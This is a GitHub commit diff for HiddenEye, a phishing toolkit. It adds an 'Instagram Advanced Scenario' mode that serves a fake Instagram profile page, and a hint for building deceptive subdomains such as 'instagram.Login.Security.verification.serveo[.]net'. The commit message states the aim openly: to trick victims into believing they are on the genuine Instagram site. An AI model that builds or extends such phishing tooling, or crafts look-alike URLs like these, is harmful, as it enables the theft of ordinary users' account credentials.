Instagram_Profile_scenario_attack

This will help to trick victim, to make them trust that they are safe, and are on the instagram profile.
I hope it will be helpful.

@usama7628674 , Thanks to Usama for his help .
#163
This commit is contained in:
AnonUD4Y 2018-12-12 16:29:32 +05:30 committed by GitHub
parent dc28176a86
commit d6925cad98
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -68,6 +68,8 @@ def runPhishing(page , customOption): #Phishing pages selection menu
copy_tree("WebPages/Instagram_web/", "Server/www/") copy_tree("WebPages/Instagram_web/", "Server/www/")
elif customOption == '2' and page == 'Instagram': elif customOption == '2' and page == 'Instagram':
copy_tree("WebPages/Instagram_autoliker/", "Server/www/") copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
elif customOption == '3' and page == 'Instagram':
copy_tree("WebPages/Instagram_advanced_attack/", "Server/www/")
elif customOption == '1' and page == 'VK': elif customOption == '1' and page == 'VK':
copy_tree("WebPages/VK/", "Server/www/") copy_tree("WebPages/VK/", "Server/www/")
elif customOption == '2' and page == 'VK': elif customOption == '2' and page == 'VK':
@ -102,7 +104,7 @@ def runNgrok():
break break
def runServeo(): def runServeo():
print(_("\n {0}Insert a custom subdomain for serveo").format(RED, DEFAULT)) print(_("\n {0}[ YOU CAN MAKE A TRICKY URL LIKE ] \n (http ://instagram.Login.Security.verification.serveo[.]net) \n\n\n {0}Insert a custom subdomain for serveo").format(RED, DEFAULT))
lnk = input(_("\n {0}CUSTOM Subdomain>>> {1}").format(RED, DEFAULT)) lnk = input(_("\n {0}CUSTOM Subdomain>>> {1}").format(RED, DEFAULT))
if not ".serveo.net" in lnk: if not ".serveo.net" in lnk:
lnk += ".serveo.net" lnk += ".serveo.net"
@ -202,7 +204,7 @@ def runMainMenu(): #menu where user select what they wanna use
runPhishing('Twitter', customOption) runPhishing('Twitter', customOption)
elif option == '8': elif option == '8':
loadModule('Instagram') loadModule('Instagram')
customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT)) customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n {0}[{1}3{0}]{1} Instagram Advanced Scenario (Appears as Instagram Profile)\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
runPhishing('Instagram', customOption) runPhishing('Instagram', customOption)
elif option == '9': elif option == '9':
loadModule('Snapchat') loadModule('Snapchat')